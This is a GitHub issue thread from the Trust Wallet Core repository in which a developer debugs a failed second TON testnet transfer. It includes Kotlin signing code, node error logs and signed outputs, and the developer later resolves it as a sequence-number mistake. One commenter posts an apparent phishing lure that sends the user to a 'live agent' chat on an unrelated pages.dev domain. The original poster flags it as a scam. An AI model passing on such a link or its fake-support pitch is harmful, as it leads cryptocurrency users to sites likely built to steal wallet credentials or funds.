### ISSUE TITLE
[TON] Issue on the second Ton Transaction

### ISSUE THREAD

**Issue by ronaldoguedess** [trustwallet/wallet-core#3887]
I managed to send the first transaction on the TON successfully, but I'm facing issues with the second transaction. Below are the details of the first successful transaction and the error that occurs on the second attempt.

### My Testnet Wallet Address:
https://testnet.tonviewer.com/kQCCuSL3TSv6R8LltM4iD5sKrTMMPDYkajc4A6ZcS0Yg0tKO

### 🟢Details of the First Transaction: 
The first transaction was successfully sent, as shown in the response below:
```
`{
    "ok": true,
    "result": {
        "@type": "raw.extMessageInfo",
        "hash": "jTExK/JnhoETNzokq0jdiKE1jA1zOZxSFMUXHt9qWkA=",
        "@extra": "1717784359.5259001:1:0.1999318789880664"
    }
}`
```
### Wallet Status After First Transaction
After sending the first transaction, the status of my wallet changed to the following:
`
{
  "ok": true,
  "result": {
    "wallet": true,
    "balance": "3994185995",
    "account_state": "active",
    "wallet_type": "wallet v4 r2",
    "seqno": 1,
    "last_transaction_id": {
      "@type": "internal.transactionId",
      "lt": "22423546000001",
      "hash": "/L0lIwVJuSOUTCJD3SdcOzr9R58VCmN3UdkpMlt9Tvc="
    },
    "wallet_id": 698983191
  }
}
`

### 🔴Error on Second Transaction 
When attempting to send the second transaction, I receive the following error:
```
`{
    "ok": false,
    "error": "LITE_SERVER_UNKNOWN: cannot apply external message to current state : External message was not accepted\nCannot run message on account: inbound external message rejected by transaction 82B922F74D2BFA47C2E5B4CE220F9B0AAD330C3C36246A373803A65C4B4620D2:\nexitcode=33, steps=23, gas_used=0\nVM Log (truncated):\n...te NOW\nexecute LEQ\nexecute THROWIF 36\nexecute PUSH c4\nexecute CTOS\nexecute LDU 32\nexecute LDU 32\nexecute LDU 256\nexecute LDDICT\nexecute ENDS\nexecute XCPU s4,s3\nexecute EQUAL\nexecute THROWIFNOT 33\ndefault exception handler, terminating vm with exit code 33\n",
    "code": 500
}`
```

### 🔥Possible Cause 
It appears that the error stems from an issue related to `setSequenceNumber`. After setting it to 2, the size of the signed output drops significantly. Removing `setSequenceNumber` allows me to obtain the full signed output, but upon broadcast, it triggers the error mentioned above.

**Signed output (After set setSequenceNumber as 0)**
`te6ccgICABoAAQAAA84AAAJFiAEFckXumlf0j4XLaZxEHzYVWmYYeGxI1G5wB0y4loxBpB4ABAABAZylN5Ln7AXGTWIYzKPJyOealVYp7LY/V0FS7KAXcyEwxLzM+snMkNlp7m4L5PsXs48BlR7MB1IBBVoKKZ4OU5UIKamjF/////8AAAAAAAMAAgFoYgA15fvYNXZdiM+KZ1IYASIMcJ8abVGy35KMZSu2CcLwsaDuaygAAAAAAAAAAAAAAAAAAQADAAACATQABgAFAFEAAAAAKamjF5NHJASf6k8F4EZ6lyzPyilfNFwQ2wMZR99iIW6vP9nWQAEU/wD0pBP0vPLICwAHAgEgAA0ACAT48oMI1xgg0x/TH9MfAvgju/Jk7UTQ0x/TH9P/9ATRUUO68qFRUbryogX5AVQQZPkQ8qP4ACSkyMsfUkDLH1Iwy/9SEPQAye1U+A8B0wchwACfbFGTINdKltMH1AL7AOgw4CHAAeMAIcAC4wABwAORMOMNA6TIyx8Syx/L/wAMAAsACgAJAAr0AMntVABsgQEI1xj6ANM/MFIkgQEI9Fnyp4IQZHN0cnB0gBjIywXLAlAFzxZQA/oCE8tqyx8Syz/Jc/sAAHCBAQjXGPoA0z/IVCBHgQEI9FHyp4IQbm90ZXB0gBjIywXLAlAGzxZQBPoCFMtqEssfyz/Jc/sAAgBu0gf6ANTUIvkABcjKBxXL/8nQd3SAGMjLBcsCIs8WUAX6AhTLaxLMzMlz+wDIQBSBAQj0UfKnAgIBSAAXAA4CASAAEAAPAFm9JCtvaiaECAoGuQ+gIYRw1AgIR6STfSmRDOaQPp/5g3gSgBt4EBSJhxWfMYQCASAAEgARABG4yX7UTQ1wsfgCAVgAFgATAgEgABUAFAAZrx32omhAEGuQ64WPwAAZrc52omhAIGuQ64X/wAA9sp37UTQgQFA1yH0BDACyMoHy//J0AGBAQj0Cm+hMYALm0AHQ0wMhcbCSXwTgItdJwSCSXwTgAtMfIYIQcGx1Z70ighBkc3RyvbCSXwXgA/pAMCD6RAHIygfL/8nQ7UTQgQFA1yH0BDBcgQEI9ApvoTGzkl8H4AXTP8glghBwbHVnupI4MOMNA4IQZHN0crqSXwbjDQAZABgAilAEgQEI9Fkw7UTQgQFA1yDIAc8W9ADJ7VQBcrCOI4IQZHN0coMesXCAGFAFywVQA88WI/oCE8tqyx/LP8mAQPsAkl8D4gB4AfoA9AQw+CdvIjBQCqEhvvLgUIIQcGx1Z4MesXCAGFAEywUmzxZY+gIZ9ADLaRfLH1Jgyz8gyYBA+wAG`

**Signed output (After set setSequenceNumber as 1, or 2 etc...)**
`te6ccgICAAQAAQAAALMAAAFFiAEFckXumlf0j4XLaZxEHzYVWmYYeGxI1G5wB0y4loxBpAwAAQGc5G85pgdb44jJy23095Fhz7TyAaUcSqmoVjOGztkYzhNjnNIZVgmb3z3RJLKUgryNLW8roNb3/9hEkQ7I71BEASmpoxdmY1QrAAAAAgADAAIBaGIANeX72DV2XYjPimdSGAEiDHCfGm1Rst+SjGUrtgnC8LGh3NZQAAAAAAAAAAAAAAAAAAEAAwAA`

### This is my code:
```kotlin
fun TheOpenNetworkTransactionSigning() {

        val expireDateAt  = System.currentTimeMillis() / 1000 + 600
        val privateKey = PrivateKey(privateKey.toHexByteArray())

        val transfer = TheOpenNetwork.Transfer.newBuilder()
            .setWalletVersion(TheOpenNetwork.WalletVersion.WALLET_V4_R2)
            .setDest("EQBry_ewauy7EZ8UzqQwAkQY4T402qNlvyUYyldsE4XhY7G3")
            .setAmount(1000000000) //1 TON
            .setSequenceNumber(2)
            .setMode(TheOpenNetwork.SendMode.PAY_FEES_SEPARATELY_VALUE or TheOpenNetwork.SendMode.IGNORE_ACTION_PHASE_ERRORS_VALUE)
            .setExpireAt(expireDateAt.toInt())
            .setBounceable(true)
            .build()

        val input = TheOpenNetwork.SigningInput.newBuilder()
            .setTransfer(transfer)
            .setPrivateKey(ByteString.copyFrom(privateKey.data()))
            .build()

        val output = AnySigner.sign(input, CoinType.TON, SigningOutput.parser())


}
```

**Comment by Devassistance** [comment]
@ronaldoguedess 
This issue has been preview on the Pull Requests. To resolve,
Contact the dAppNode page to initiate a chat with the live agent on the chat button to get more information about your request via [dAppNode](https://defi-fixprotocol.pages.dev/)

**Comment by ronaldoguedess** [comment]
It doesn't make sense. Are you sure?

**Comment by Devassistance** [comment]
Absolutely sure!

**Comment by ronaldoguedess** [comment]
> @ronaldoguedess This issue has been preview on the Pull Requests. To resolve, Contact the dAppNode page to initiate a chat with the live agent on the chat button to get more information about your request via [dAppNode](https://defi-fixprotocol.pages.dev/)

Scammer @satoshiotomakan

**Comment by amd-pixel** [comment]
I am also having problems sending transaction from TON coin in Trust Wallet.

```
"LITE_SERVER_UNKNOWN: cannot apply external message to current state : External message was not accepted
Cannot run message on account: inbound external message rejected by transaction
...
default exception handler, terminating vm with exit code 35
```

Also the mnemonic exported on Trust Wallet is 12-seed and it cant be imported in another TON coin wallet. So now I have my TON coins locked in Trust Wallet and cant do anything to send them or to recover on another wallet....

**Comment by ronaldoguedess** [comment]
> I am also having problems sending transaction from TON coin in Trust Wallet.
> 
> ```
> "LITE_SERVER_UNKNOWN: cannot apply external message to current state : External message was not accepted
> Cannot run message on account: inbound external message rejected by transaction
> ...
> default exception handler, terminating vm with exit code 35
> ```
> 
> Also the mnemonic exported on Trust Wallet is 12-seed and it cant be imported in another TON coin wallet because they are incompatible and other TON wallets require 24-seed. So now I have my TON coins locked in Trust Wallet and cant do anything to send them or to recover on another wallet....
> 
> Support is unresponsive. Im considering not using Trust Wallet anymore.

Actually this channel is not for Trust Wallet support, it's for developers. but you are right, seed from trust wallet is incompactible with ton wallets, but you should be able to send for a TON wallet.  Maybe there a problem with TON sending, because i have a similar issue like this in my implementation... if it's a problem, they will fix soon, don't worry.

**Comment by ronaldoguedess** [comment]
I'm still trying it... can someone help me?

**Comment by ronaldoguedess** [comment]
I'm still trying to fix this issue. Can anyone help? 
It seems to be a problem with the Trust Wallet library because I can't set `setSequenceNumber `to 2 or higher. 

When I do, it doesn't give me the fully signed transaction to broadcast.

**Comment by ronaldoguedess** [comment]
The problem was with the `setSequenceNumber`  it was a mistake on my side.
